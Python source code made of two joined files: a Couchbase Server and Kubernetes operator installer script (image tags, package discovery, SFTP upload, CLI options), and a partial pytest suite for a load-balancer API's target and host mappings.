    Image tags are derived from the supplied versions: a version containing a
    build suffix ("X.Y.Z-NNNN") is pulled from the internal GitLab registry,
    a plain release from Docker Hub.
    """

    def __init__(self, cluster_spec, options):
        self.options = options
        self.cluster_spec = cluster_spec

        self.operator_version = self.options.operator_version
        if "-" in self.operator_version:
            # Internal build -> private registry images.
            self.operator_release = self.operator_version.split("-")[0]
            self.operator_tag = 'registry.gitlab.com/cb-vanilla/operator:{}'\
                .format(self.operator_version)
            self.admission_controller_release = self.operator_version.split("-")[0]
            self.admission_controller_tag = \
                'registry.gitlab.com/cb-vanilla/admission-controller:{}' \
                .format(self.operator_version)
        else:
            self.operator_release = self.operator_version
            self.operator_tag = 'couchbase/operator:{}'\
                .format(self.operator_version)
            self.admission_controller_release = self.operator_version
            self.admission_controller_tag = 'couchbase/admission-controller:{}' \
                .format(self.operator_version)

        self.couchbase_version = self.options.couchbase_version
        if "-" in self.couchbase_version:
            self.couchbase_release = self.couchbase_version.split("-")[0]
            self.couchbase_tag = 'registry.gitlab.com/cb-vanilla/server:{}'\
                .format(self.couchbase_version)
        else:
            self.couchbase_release = self.couchbase_version
            self.couchbase_tag = 'couchbase/server:{}'\
                .format(self.couchbase_version)

        self.operator_backup_version = self.options.operator_backup_version
        if self.operator_backup_version:
            if "-" in self.operator_backup_version:
                self.operator_backup_release = self.operator_backup_version.split("-")[0]
                self.operator_backup_tag = 'registry.gitlab.com/cb-vanilla/operator-backup:{}'\
                    .format(self.operator_backup_version)
            else:
                self.operator_backup_release = self.operator_backup_version
                # Bug fix: the tag separator was '/', which produced the
                # invalid docker reference "couchbase/operator-backup/X.Y.Z".
                # Every other Docker Hub tag in this class uses ':'.
                self.operator_backup_tag = 'couchbase/operator-backup:{}'\
                    .format(self.operator_backup_version)
        else:
            self.operator_backup_tag = 'registry.gitlab.com/cb-vanilla/operator-backup:latest'

        # One Couchbase pod per host listed in the 'couchbase1' cluster.
        self.node_count = len(self.cluster_spec.infrastructure_clusters['couchbase1'].split())
        self.remote = RemoteHelper(cluster_spec)
        self.docker_config_path = os.path.expanduser("~") + "/.docker/config.json"
        # Manifests live under cloud/operator/<major>/<minor>.
        self.operator_base_path = "cloud/operator/{}/{}"\
            .format(self.operator_release.split(".")[0],
                    self.operator_release.split(".")[1])
        self.certificate_authority_path = "{}/ca.crt"\
            .format(self.operator_base_path)
        self.crd_path = "{}/crd.yaml"\
            .format(self.operator_base_path)
        self.config_path = "{}/config.yaml"\
            .format(self.operator_base_path)
        self.config_template_path = "{}/config_template.yaml"\
            .format(self.operator_base_path)
        self.auth_path = "{}/auth_secret.yaml"\
            .format(self.operator_base_path)
        self.cb_cluster_path = "{}/couchbase-cluster.yaml"\
            .format(self.operator_base_path)
        self.template_cb_cluster_path = "{}/couchbase-cluster_template.yaml"\
            .format(self.operator_base_path)
        self.worker_base_path = "cloud/worker"
        self.worker_path = "{}/worker.yaml"\
            .format(self.worker_base_path)
        self.rmq_base_path = "cloud/broker/rabbitmq/0.48"
        self.rmq_operator_path = "{}/cluster-operator.yaml"\
            .format(self.rmq_base_path)
        self.rmq_cluster_path = "{}/rabbitmq.yaml"\
            .format(self.rmq_base_path)

    def install(self):
        """Install the operator stack, then the celery broker."""
        self.install_operator()
        self.install_celery_broker()

    def install_operator(self):
        """Deploy secrets, CRD, config, auth, and the Couchbase cluster."""
        logger.info("installing operator")
        self.create_secrets()
        self.create_crd()
        self.create_config()
        self.wait_for_operator_and_admission()
        self.create_auth()
        self.create_cluster()
        self.wait_for_cluster()

    def install_celery_broker(self):
        """Deploy the RabbitMQ operator, broker cluster, and its config."""
        logger.info("installing celery broker")
        self.create_rabbitmq_operator()
        self.wait_for_rabbitmq_operator()
        self.create_rabbitmq_cluster()
        self.wait_for_rabbitmq_cluster()
        self.creating_rabbitmq_config()

    def uninstall(self):
        """Tear everything down: operator, broker, workers, leftovers."""
        self.uninstall_operator()
        self.uninstall_celery_broker()
        self.uninstall_workers()
        self.delete_artifacts()

    def uninstall_operator(self):
        logger.info("uninstalling operator")
        self.delete_operator_files()
        self.delete_operator_secrets()
        self.wait_for_operator_deletion()

    def uninstall_celery_broker(self):
        logger.info("uninstalling celery broker")
        self.delete_rabbitmq_files()
        self.wait_for_rabbitmq_deletion()

    def uninstall_workers(self):
        logger.info("uninstall workers")
        self.delete_worker_files()
        self.wait_for_worker_deletion()

    def create_secrets(self):
        logger.info("creating secrets")
        self.remote.create_docker_secret(
            self.docker_config_path)
        self.remote.create_operator_tls_secret(
            self.certificate_authority_path)

    def create_crd(self):
        logger.info("creating CRD")
        self.remote.create_from_file(self.crd_path)

    def create_config(self):
        logger.info("creating config")
        self.remote.create_operator_config(
            self.config_template_path,
            self.config_path,
            self.operator_tag,
            self.admission_controller_tag)

    def create_auth(self):
        logger.info("creating auth")
        self.remote.create_from_file(self.auth_path)

    def create_cluster(self):
        logger.info("creating couchbase cluster")
        self.remote.create_couchbase_cluster(
            self.template_cb_cluster_path,
            self.cb_cluster_path,
            self.couchbase_tag,
            self.operator_backup_tag,
            self.node_count)

    def wait_for_operator_and_admission(self):
        logger.info("waiting for operator and admission controller")
        self.remote.wait_for_admission_controller_ready()
        self.remote.wait_for_operator_ready()

    def wait_for_cluster(self):
        logger.info("waiting for cluster")
        self.remote.wait_for_couchbase_pods_ready(self.node_count)

    def create_rabbitmq_operator(self):
        logger.info("creating rabbitmq operator")
        self.remote.create_from_file(self.rmq_operator_path)

    def wait_for_rabbitmq_operator(self):
        logger.info("waiting for rabbitmq operator")
        self.remote.wait_for_rabbitmq_operator_ready()

    def create_rabbitmq_cluster(self):
        logger.info("creating rabbitmq cluster")
        self.remote.create_from_file(self.rmq_cluster_path)

    def wait_for_rabbitmq_cluster(self):
        logger.info("waiting for rabbitmq cluster")
        self.remote.wait_for_rabbitmq_broker_ready()

    # NOTE: name kept for backward compatibility ("creating" vs "create").
    def creating_rabbitmq_config(self):
        logger.info("creating rabbitmq config")
        self.remote.upload_rabbitmq_config()

    def delete_operator_files(self):
        logger.info("deleting operator files")
        files = [self.cb_cluster_path, self.auth_path,
                 self.config_path, self.crd_path]
        self.remote.delete_from_files(files)

    def delete_operator_secrets(self):
        logger.info("deleting operator secrets")
        secrets = ['regcred', 'couchbase-operator-tls',
                   'couchbase-server-tls', 'user-password-secret']
        self.remote.delete_secrets(secrets)

    def wait_for_operator_deletion(self):
        logger.info("waiting for operator deletion")
        self.remote.wait_for_operator_deletion()

    def delete_rabbitmq_files(self):
        logger.info("deleting rabbit mq files")
        self.remote.delete_from_files(
            [self.rmq_cluster_path,
             self.rmq_operator_path])

    def wait_for_rabbitmq_deletion(self):
        logger.info("waiting for rabbitmq deletion")
        self.remote.wait_for_rabbitmq_deletion()

    def delete_worker_files(self):
        logger.info("deleting worker files")
        self.remote.delete_from_file(self.worker_path)

    def wait_for_worker_deletion(self):
        logger.info("waiting for worker deletion")
        self.remote.wait_for_workers_deletion()

    def delete_artifacts(self):
        logger.info("deleting any artifact pods, pvcs, and backups")
        self.remote.delete_all_backups()
        self.remote.delete_all_pods()
        self.remote.delete_all_pvc()
class KubernetesInstaller:
    """Generic Kubernetes deployment flow: storage class, Istio, then operator.

    Provider-specific subclasses (EKS/AKS/GKE) implement the storage-class and
    Istio hooks.
    """
    def __init__(self, cluster_spec, options):
        self.options = options
        self.cluster_spec = cluster_spec
        self.operator_installer = OperatorInstaller(cluster_spec, options)
    def install(self):
        # Storage and service mesh must exist before the operator is deployed.
        self.install_storage_class()
        self.install_istio()
        self.operator_installer.install()
    def uninstall(self):
        # Tear down in reverse order of installation.
        self.operator_installer.uninstall()
        self.uninstall_istio()
        self.uninstall_storage_class()
    def install_storage_class(self):
        raise NotImplementedError
    def uninstall_storage_class(self):
        raise NotImplementedError
    def install_istio(self):
        raise NotImplementedError
    def uninstall_istio(self):
        raise NotImplementedError
class EKSInstaller(KubernetesInstaller):
    """Amazon EKS flavour: EBS gp2 storage class and optional Istio mesh."""
    # Maps cluster-spec storage-class names to their manifest file;
    # None means "no manifest to apply" (cluster default).
    STORAGE_CLASSES = {
        'default': None,
        'gp2': 'cloud/infrastructure/aws/eks/ebs-gp2-sc.yaml'
    }
    def __init__(self, cluster_spec, options):
        super().__init__(cluster_spec, options)
    def install_storage_class(self):
        """Remove all existing storage classes, then apply the configured one."""
        scs = self.operator_installer.remote.get_storage_classes()
        for sc in scs['items']:
            sc_name = sc['metadata']['name']
            self.operator_installer.remote.delete_storage_class(sc_name)
        for cluster in self.cluster_spec.kubernetes_clusters():
            sc = self.cluster_spec.kubernetes_storage_class(cluster)
            if self.STORAGE_CLASSES[sc]:
                self.operator_installer.remote.create_from_file(self.STORAGE_CLASSES[sc])
    def uninstall_storage_class(self):
        """Delete the storage-class manifests this installer applied."""
        for cluster in self.cluster_spec.kubernetes_clusters():
            sc = self.cluster_spec.kubernetes_storage_class(cluster)
            if self.STORAGE_CLASSES[sc]:
                self.operator_installer.remote.delete_from_file(self.STORAGE_CLASSES[sc])
    def install_istio(self):
        """Install Istio (pinned to utility nodes) and enable default-namespace injection."""
        if not self.cluster_spec.istio_enabled('k8s_cluster_1'):
            return
        istio_install_cmd = "install " \
                            "--set profile=default " \
                            "--set values.global.defaultNodeSelector.'NodeRoles'=utilities -y"
        istio_label_cmd = "label namespace default istio-injection=enabled --overwrite"
        self.operator_installer.remote.istioctl(istio_install_cmd)
        self.operator_installer.remote.kubectl(istio_label_cmd)
    def uninstall_istio(self):
        """Purge Istio, its namespace, and the injection label."""
        if not self.cluster_spec.istio_enabled('k8s_cluster_1'):
            return
        self.operator_installer.remote.istioctl("x uninstall --purge -y")
        self.operator_installer.remote.delete_namespace("istio-system")
        self.operator_installer.remote.kubectl("label namespace default istio-injection-")
    def install_kubernetes_dashboard(self):
        pass
    def uninstall_kubernetes_dashboard(self):
        pass
class AKSInstaller(KubernetesInstaller):
    """Azure AKS flavour; defines no provider-specific storage/Istio hooks yet."""
    def __init__(self, cluster_spec, options):
        super().__init__(cluster_spec, options)
class GKEInstaller(KubernetesInstaller):
    """Google GKE flavour; defines no provider-specific storage/Istio hooks yet."""
    def __init__(self, cluster_spec, options):
        super().__init__(cluster_spec, options)
class CouchbaseInstaller:
    """Finds, downloads, and installs a Couchbase Server package on a cluster."""

    def __init__(self, cluster_spec, options):
        self.remote = RemoteHelper(cluster_spec, options.verbose)
        self.options = options
        self.cluster_spec = cluster_spec

    @property
    def url(self) -> str:
        """Explicit package URL if one was supplied, else the discovered build URL."""
        if validators.url(self.options.couchbase_version):
            return self.options.couchbase_version
        else:
            return self.find_package(edition=self.options.edition)

    @property
    def release(self) -> str:
        """Release part of a "release-build" version string (e.g. "7.1.0")."""
        return self.options.couchbase_version.split('-')[0]

    @property
    def build(self) -> str:
        """Build number of a "release-build" version string, or None for plain releases."""
        split = self.options.couchbase_version.split('-')
        if len(split) > 1:
            return split[1]

    def find_package(self, edition: str,
                     package: str = None, os_release: str = None) -> str:
        """Return the first candidate URL that exists; interrupt if none do.

        Fixed the return annotation, which was the meaningless "[str, str]".
        """
        for url in self.url_iterator(edition, package, os_release):
            if self.is_exist(url):
                return url
        logger.interrupt('Target build not found')

    def url_iterator(self, edition: str,
                     package: str = None, os_release: str = None) -> Iterator[str]:
        """Yield candidate package URLs for every location/pattern combination."""
        if package is None:
            if self.remote.package == 'rpm':
                if self.cluster_spec.cloud_infrastructure:
                    os_arch = self.cluster_spec.infrastructure_settings.get('os_arch', 'x86_64')
                    if os_arch == 'arm':
                        os_release = 'amzn2.aarch64'
                    elif os_arch == 'al2':
                        # Bug fix: this line used "==" (a no-op comparison)
                        # instead of "=", so os_release stayed unset for al2.
                        os_release = 'amzn2.x86_64'
                    else:
                        os_release = self.remote.detect_centos_release()
                else:
                    os_release = self.remote.detect_centos_release()
            elif self.remote.package == 'deb':
                os_release = self.remote.detect_ubuntu_release()
            package = self.remote.package

        for pkg_pattern in PKG_PATTERNS[package]:
            for loc_pattern in LOCATIONS:
                url = loc_pattern + pkg_pattern
                yield url.format(release=self.release, build=self.build,
                                 edition=edition, os=os_release)

    @staticmethod
    def is_exist(url):
        """True when a HEAD request for *url* answers 200."""
        try:
            status_code = requests.head(url).status_code
        except ConnectionError:
            return False
        return status_code == 200

    def download(self):
        """Download and save a copy of the specified package."""
        if self.remote.package == 'rpm':
            logger.info('Saving a local copy of {}'.format(self.url))
            with open('couchbase.rpm', 'wb') as fh:
                resp = requests.get(self.url)
                fh.write(resp.content)
        else:
            logger.interrupt('Unsupported package format')

    def download_local(self, local_copy_url: str = None):
        """Best-effort download of a Debian package for the local (client) host."""
        try:
            if RemoteHelper.detect_server_os("127.0.0.1", self.cluster_spec).\
                    upper() in ('UBUNTU', 'DEBIAN'):
                os_release = detect_ubuntu_release()
                if local_copy_url:
                    url = local_copy_url
                else:
                    url = self.find_package(edition=self.options.edition,
                                            package="deb", os_release=os_release)
                logger.info('Saving a local copy of {}'.format(url))
                with open('couchbase.deb', 'wb') as fh:
                    resp = requests.get(url)
                    fh.write(resp.content)
        except Exception:
            # Deliberate best-effort: a missing package is logged, not fatal.
            # (Previously also caught BaseException, which swallowed Ctrl-C.)
            logger.info("Saving local copy for ubuntu failed, package may not present")

    def download_remote(self):
        """Download and save a copy of the specified package on a remote client."""
        if self.remote.package == 'rpm':
            logger.info('Saving a remote copy of {}'.format(self.url))
            self.wget(url=self.url)
        else:
            logger.interrupt('Unsupported package format')

    @master_client
    def wget(self, url):
        """Fetch *url* into /tmp on the master client and rename it couchbase.rpm."""
        logger.info('Fetching {}'.format(url))
        with cd('/tmp'):
            run('wget -nc "{}"'.format(url))
            package = url.split('/')[-1]
            run('mv {} couchbase.rpm'.format(package))

    def kill_processes(self):
        self.remote.kill_processes()

    def uninstall_package(self):
        self.remote.uninstall_couchbase()

    def clean_data(self):
        self.remote.clean_data()

    def install_package(self):
        logger.info('Using this URL: {}'.format(self.url))
        self.remote.upload_iss_files(self.release)
        self.remote.install_couchbase(self.url)

    def install(self):
        """Full reinstall: stop, remove old package, wipe data, install fresh."""
        self.kill_processes()
        self.uninstall_package()
        self.clean_data()
        self.install_package()
class CloudInstaller(CouchbaseInstaller):
    """Cloud-VM installer: downloads the package locally, then pushes it to
    every server over SFTP (one process per host) before installing."""
    def __init__(self, cluster_spec, options):
        super().__init__(cluster_spec, options)
    def install_package(self):
        """Download the package once, fan out uploads, then install everywhere."""
        logger.info('Using this URL: {}'.format(self.url))
        self.remote.upload_iss_files(self.release)
        package_name = "couchbase.{}".format(self.remote.package)
        logger.info('Saving a local copy of {}'.format(self.url))
        with open(package_name, 'wb') as fh:
            resp = requests.get(self.url)
            fh.write(resp.content)
        logger.info('Uploading {} to servers'.format(package_name))
        uploads = []
        user, password = self.cluster_spec.ssh_credentials
        hosts = self.cluster_spec.servers
        if self.options.remote_copy:
            # Workers also receive a copy when a remote copy was requested.
            hosts += self.cluster_spec.workers
        for host in hosts:
            logger.info('Uploading {} to {}'.format(package_name, host))
            args = (host, user, password, package_name)
            # Upload runs in a separate (forked) daemon process per host.
            def upload_couchbase(to_host, to_user, to_password, package):
                client = paramiko.SSHClient()
                client.set_missing_host_key_policy(paramiko.WarningPolicy())
                client.connect(to_host, username=to_user, password=to_password)
                sftp = client.open_sftp()
                sftp.put(package, "/tmp/{}".format(package))
                sftp.close()
            worker_process = Process(target=upload_couchbase, args=args)
            worker_process.daemon = True
            worker_process.start()
            uploads.append(worker_process)
        # Wait for every upload to finish before installing.
        for process in uploads:
            process.join()
        self.remote.install_uploaded_couchbase(package_name)
def get_args():
    """Parse the installer's command-line options.

    Returns an argparse.Namespace. --couchbase-version accepts either a
    "release-build" string or a direct HTTP URL to a package.
    """
    parser = ArgumentParser()

    parser.add_argument('-v', '--version', '--url', '-cv', '--couchbase-version',
                        required=True,
                        dest='couchbase_version',
                        help='the build version or the HTTP URL to a package')
    parser.add_argument('-c', '--cluster',
                        required=True,
                        help='the path to a cluster specification file')
    parser.add_argument('-e', '--edition',
                        choices=['enterprise', 'community'],
                        default='enterprise',
                        help='the cluster edition')
    parser.add_argument('--verbose',
                        action='store_true',
                        help='enable verbose logging')
    parser.add_argument('--local-copy',
                        action='store_true',
                        help='save a local copy of a package')
    parser.add_argument('--remote-copy',
                        action='store_true',
                        help='save a remote copy of a package')
    parser.add_argument('--local-copy-url',
                        default=None,
                        help='The local copy url of the build')
    parser.add_argument('-ov', '--operator-version',
                        dest='operator_version',
                        help='the build version for the couchbase operator')
    # Help text fixed: it was a copy-paste of the --operator-version text.
    parser.add_argument('-obv', '--operator-backup-version',
                        dest='operator_backup_version',
                        help='the build version for the couchbase operator backup')
    # Help text fixed: it was a copy-paste of the --cluster description.
    parser.add_argument('-u', '--uninstall',
                        action='store_true',
                        help='uninstall the currently installed artifacts')

    return parser.parse_args()
def main():
    """CLI entry point: pick the installer for the target infrastructure and run it."""
    args = get_args()

    cluster_spec = ClusterSpec()
    cluster_spec.parse(fname=args.cluster)

    if cluster_spec.cloud_infrastructure:
        if cluster_spec.kubernetes_infrastructure:
            infra_provider = cluster_spec.infrastructure_settings['provider']
            if infra_provider == 'aws':
                installer = EKSInstaller(cluster_spec, args)
            elif infra_provider == 'azure':
                installer = AKSInstaller(cluster_spec, args)
            elif infra_provider == 'gcp':
                installer = GKEInstaller(cluster_spec, args)
            else:
                raise Exception("{} is not a valid infrastructure provider"
                                .format(infra_provider))
        else:
            installer = CloudInstaller(cluster_spec, args)
        if args.uninstall:
            installer.uninstall()
        else:
            installer.install()
    else:
        installer = CouchbaseInstaller(cluster_spec, args)
        installer.install()
        if args.local_copy:
            installer.download()
            installer.download_local(args.local_copy_url)
        # Bug fix: consult the parsed flag instead of scanning sys.argv for the
        # literal '--remote-copy', which missed abbreviated argparse spellings.
        if args.remote_copy:
            logger.info('Saving a remote copy')
            installer.download_remote()
# Script entry point.
if __name__ == '__main__':
    main()
| |
from common_fixtures import * # NOQA
from cattle import ApiError
@pytest.fixture(scope='module')
def config_id(client):
    """Module-scoped fixture: id of one active default loadBalancerConfig."""
    default_lb_config = client. \
        create_loadBalancerConfig(name=random_str())
    default_lb_config = client.wait_success(default_lb_config)
    return default_lb_config.id
# test (C)
def test_lb_create_wo_config(client):
    """Creating an LB without loadBalancerConfigId must 422 with MissingRequired."""
    with pytest.raises(ApiError) as e:
        client.create_loadBalancer(name=random_str())
    assert e.value.error.status == 422
    assert e.value.error.code == 'MissingRequired'
    assert e.value.error.fieldName == 'loadBalancerConfigId'
# test (C)
def test_lb_create_w_config(client, config_id):
    """An LB created with a valid config becomes active and keeps the config id."""
    lb = _create_valid_lb(client, config_id)
    assert lb.state == 'active'
    assert lb.loadBalancerConfigId == config_id
# test (D)
def test_lb_remove(client, config_id):
    """Deleting an LB transitions it to the 'removed' state."""
    # create lb
    lb = _create_valid_lb(client, config_id)
    # remove newly created lb
    lb = client.wait_success(client.delete(lb))
    assert lb.state == 'removed'
# test (U)
def test_lb_update(client, config_id):
    """Updating an LB's name is reflected on the returned resource."""
    # create lb
    lb = _create_valid_lb(client, config_id)
    # update the lb
    lb = client.update(lb, name='newName')
    assert lb.name == 'newName'
def test_lb_add_target_instance(client, context, config_id):
    """Adding a container target creates an active target map."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, container=container)
    _validate_add_target(container, lb, client)
def test_lb_add_target_instance_with_ports(client, context, config_id):
    """Adding a container target with explicit port mappings preserves them."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, container=container,
                     ports=["77:a.com", "99:b.com, c.com"])
    _validate_add_target(container, lb,
                         client, ports=["77:a.com", "99:b.com, c.com"])
def test_lb_remove_target_instance(client, context, config_id):
    """A container target can be added and then removed cleanly."""
    container, lb = _create_lb_and_container(client, context, config_id)
    lb = _add_target(lb, container=container)
    _validate_add_target(container, lb, client)
    # remove the target and verify that the target no longer exists
    lb = _remove_target(lb, container)
    _validate_remove_target(container, lb, client)
def test_lb_add_target_ip_address(client, context, config_id):
    """Adding a bare IP target creates an active target map."""
    lb = _create_valid_lb(client, config_id)
    ip_address = "10.1.1.1"
    lb = _add_target(lb, ip_address=ip_address)
    lb = client.wait_success(lb)
    _validate_add_target_ip(ip_address, lb, client)
def test_lb_remove_target_ip_address(client, context, config_id):
    """An IP target can be added and then removed cleanly."""
    lb = _create_valid_lb(client, config_id)
    # add target to a load balancer and verify that it got created
    ip_address = "10.1.1.1"
    lb = _add_target(lb, ip_address=ip_address)
    _validate_add_target_ip(ip_address, lb, client)
    # remove the target and verify that the target no longer exists
    lb = _remove_target(lb, ip_address=ip_address)
    _validate_remove_target_ip(ip_address, lb, client)
def test_lb_remove_w_target(client, context, config_id):
    """Deleting an LB also removes its target maps."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, container=container)
    lb = client.wait_success(lb)
    # remove the load balancer
    lb = client.wait_success(client.delete(lb))
    assert lb.state == 'removed'
    _validate_remove_target(container, lb, client)
def test_lb_remove_w_host(client, context, config_id):
    """Deleting an LB also removes its host maps."""
    host = context.host
    # create lb, assign the hosts to it
    lb = _create_valid_lb(client, config_id)
    lb = lb.addhost(hostId=host.id)
    _validate_add_host(host, lb, client)
    # remove the load balancer
    lb = client.wait_success(client.delete(lb))
    assert lb.state == 'removed'
    _validate_remove_host(host, lb, client)
def test_set_target_instance(client, context, config_id):
    """settargets replaces the full container-target list (2 -> 1 -> 0)."""
    container1, lb = _create_lb_and_container(client, context, config_id)
    container2 = client. \
        create_container(imageUuid=context.image_uuid,
                         startOnCreate=False)
    container2 = client.wait_success(container2)
    # set 2 targets
    lb = _set_targets(lb, containers=[container1, container2])
    lb = client.wait_success(lb)
    _validate_add_target(container1, lb, client)
    _validate_add_target(container2, lb, client)
    # set 1 target
    lb = _set_targets(lb, containers=[container1])
    _validate_add_target(container1, lb, client)
    _validate_remove_target(container2, lb, client)
    # set 0 targets
    lb = _set_targets(lb, containers=[])
    _validate_remove_target(container1, lb, client)
def test_lb_set_target_ip_address(client, context, config_id):
    """settargets replaces the full IP-target list (2 -> 1 -> 0)."""
    lb = _create_valid_lb(client, config_id)
    # set 2 targets
    lb = _set_targets(lb, ip_addresses=["10.1.1.1", "10.1.1.2"])
    _validate_add_target_ip("10.1.1.1", lb, client)
    _validate_add_target_ip("10.1.1.2", lb, client)
    # set 1 target
    lb = _set_targets(lb, ip_addresses=["10.1.1.1"])
    _validate_add_target_ip("10.1.1.1", lb, client)
    _validate_remove_target_ip("10.1.1.2", lb, client)
    # set 0 targets
    lb = _set_targets(lb, ip_addresses=[])
    _validate_remove_target_ip("10.1.1.1", lb, client)
def test_set_target_instance_and_ip(client, context, config_id):
    """settargets accepts a mix of container and IP targets at once."""
    container1, lb = _create_lb_and_container(client, context, config_id)
    # set 2 targets - one ip and one instanceId
    lb = _set_targets(lb, containers=[container1], ip_addresses=["10.1.1.1"])
    _validate_add_target(container1, lb, client)
    _validate_add_target_ip("10.1.1.1", lb, client)
def test_lb_add_target_instance_twice(client, context, config_id):
    """Adding the same container target twice must 422 with NotUnique."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, container)
    _validate_add_target(container, lb, client)
    with pytest.raises(ApiError) as e:
        _add_target(lb, container)
    assert e.value.error.status == 422
    assert e.value.error.code == 'NotUnique'
    assert e.value.error.fieldName == 'instanceId'
def test_lb_remove_non_existing_target_instance(client, context, config_id):
    """Removing a container target that was never added must 422 with InvalidOption."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # remove non-existing target
    with pytest.raises(ApiError) as e:
        _remove_target(lb, container)
    assert e.value.error.status == 422
    assert e.value.error.code == 'InvalidOption'
    assert e.value.error.fieldName == 'instanceId'
def test_lb_add_target_ip_address_and_instance(client, context, config_id):
    """A single target may not specify both an instance and an IP address."""
    container, lb = _create_lb_and_container(client, context, config_id)
    with pytest.raises(ApiError) as e:
        _add_target(lb, container=container, ip_address="10.1.1.1")
    assert e.value.error.status == 422
    assert e.value.error.code == 'InvalidOption'
    assert e.value.error.fieldName == 'ipAddress'
def test_lb_add_target_w_no_option(client, context, config_id):
    """A target with neither instance nor IP must 422 with MissingRequired."""
    container, lb = _create_lb_and_container(client, context, config_id)
    with pytest.raises(ApiError) as e:
        _add_target(lb)
    assert e.value.error.status == 422
    assert e.value.error.code == 'MissingRequired'
    assert e.value.error.fieldName == 'instanceId'
def test_lb_add_target_ip_twice(client, context, config_id):
    """Adding the same IP target twice must 422 with NotUnique."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, ip_address="10.1.1.1")
    _validate_add_target_ip("10.1.1.1", lb, client)
    with pytest.raises(ApiError) as e:
        _add_target(lb, ip_address="10.1.1.1")
    assert e.value.error.status == 422
    assert e.value.error.code == 'NotUnique'
    assert e.value.error.fieldName == 'ipAddress'
def test_lb_remove_non_existing_target_ip(client, context, config_id):
    """Removing an IP target that was never added must 422 with InvalidOption."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # remove non-existing target
    with pytest.raises(ApiError) as e:
        _remove_target(lb, ip_address="10.1.1.1")
    assert e.value.error.status == 422
    assert e.value.error.code == 'InvalidOption'
    assert e.value.error.fieldName == 'ipAddress'
def test_add_removed_target_again(client, context, config_id):
    """A target removed from an LB can be re-added without error."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, container=container)
    _validate_add_target(container, lb, client)
    # remove the target
    lb = _remove_target(lb, container)
    _validate_remove_target(container, lb, client)
    # add the target - should be allowed
    _add_target(lb, container)
def test_destroy_container(client, context, config_id):
    """Destroying a target container removes its target map from the LB."""
    container, lb = _create_lb_and_container(client, context, config_id)
    # add target to a load balancer
    lb = _add_target(lb, container=container)
    _validate_add_target(container, lb, client)
    # destroy the instance
    # stop the target container first (comment fixed: this is the container,
    # not the lb instance)
    container = client.wait_success(container)
    if container.state == 'running':
        container = client.wait_success(container.stop())
        assert container.state == 'stopped'
    # remove the target container
    container = client.wait_success(container.remove())
    assert container.state == 'removed'
    _validate_remove_target(container, lb, client)
def _resource_is_active(resource):
    """wait_for_condition predicate: resource has reached 'active'."""
    return resource.state == 'active'
def _resource_is_removed(resource):
    """wait_for_condition predicate: resource has reached 'removed'."""
    return resource.state == 'removed'
def _validate_add_host(host, lb, client):
    """Assert exactly one host map links *host* to *lb* and wait until active."""
    host_maps = client. \
        list_loadBalancerHostMap(loadBalancerId=lb.id,
                                 hostId=host.id)
    assert len(host_maps) == 1
    host_map = host_maps[0]
    wait_for_condition(
        client, host_map, _resource_is_active,
        lambda x: 'State is: ' + x.state)
    assert host_map.hostId == host.id
def _validate_remove_host(host, lb, client):
    """Wait until the host map for *host* on *lb* reaches 'removed'; return it."""
    host_maps = client. \
        list_loadBalancerHostMap(loadBalancerId=lb.id,
                                 hostId=host.id)
    assert len(host_maps) == 1
    host_map = host_maps[0]
    wait_for_condition(
        client, host_map, _resource_is_removed,
        lambda x: 'State is: ' + x.state)
    return host_map
def _add_target(lb, container=None, ip_address=None, ports=None):
    """Attach one target (container instance and/or IP) to *lb*; default port "99"."""
    target = {
        "instanceId": container.id if container else None,
        "ipAddress": ip_address,
        "ports": ports or ["99"],
    }
    return lb.addtarget(loadBalancerTarget=target)
def _remove_target(lb, container=None, ip_address=None, ports=None):
    """Detach one target (container instance and/or IP) from *lb*; default port "99"."""
    target = {
        "instanceId": container.id if container else None,
        "ipAddress": ip_address,
        "ports": ports or ["99"],
    }
    return lb.removetarget(loadBalancerTarget=target)
def _validate_add_target_ip(ip_address, lb, client):
    """Assert exactly one IP target map exists on *lb* and wait until active."""
    target_maps = client. \
        list_loadBalancerTarget(loadBalancerId=lb.id,
                                ipAddress=ip_address)
    assert len(target_maps) == 1
    target_map = target_maps[0]
    wait_for_condition(
        client, target_map, _resource_is_active,
        lambda x: 'State is: ' + x.state)
    assert target_map.ipAddress == ip_address
def _validate_remove_target_ip(ip_address, lb, client):
    """Wait until the IP target map on *lb* reaches 'removed'."""
    target_maps = client. \
        list_loadBalancerTarget(loadBalancerId=lb.id,
                                ipAddress=ip_address)
    assert len(target_maps) == 1
    target_map = target_maps[0]
    wait_for_condition(
        client, target_map, _resource_is_removed,
        lambda x: 'State is: ' + x.state)
def _validate_add_target(container, lb, client, ports=None):
    """Assert one active container target map on *lb*; optionally check ports."""
    target_maps = client. \
        list_loadBalancerTarget(loadBalancerId=lb.id,
                                instanceId=container.id)
    assert len(target_maps) == 1
    target_map = target_maps[0]
    wait_for_condition(
        client, target_map, _resource_is_active,
        lambda x: 'State is: ' + x.state)
    if ports:
        assert target_map.ports == ports
def _validate_remove_target(container, lb, client):
    """Wait until the container target map on *lb* reaches 'removed'."""
    target_maps = client. \
        list_loadBalancerTarget(loadBalancerId=lb.id,
                                instanceId=container.id)
    assert len(target_maps) == 1
    target_map = target_maps[0]
    wait_for_condition(
        client, target_map, _resource_is_removed,
        lambda x: 'State is: ' + x.state)
def _create_valid_lb(client, config_id):
    """Create an LB bound to *config_id* and wait for it to settle."""
    test_lb = client. \
        create_loadBalancer(name=random_str(),
                            loadBalancerConfigId=config_id)
    test_lb = client.wait_success(test_lb)
    return test_lb
def _create_lb_and_container(client, context, config_id):
    """Create an LB plus an unstarted container; return (container, lb)."""
    # create load balancer
    lb = _create_valid_lb(client, config_id)
    # create a container, no need to start it
    container = client.create_container(imageUuid=context.image_uuid,
                                        startOnCreate=False)
    container = client.wait_success(container)
    return container, lb
def _set_targets(lb, containers=None, ip_addresses=None):
    """Replace the LB's whole target list with the given containers/IPs."""
    instance_targets = [{"instanceId": c.id, "ports": "100: foo.com"}
                        for c in containers or []]
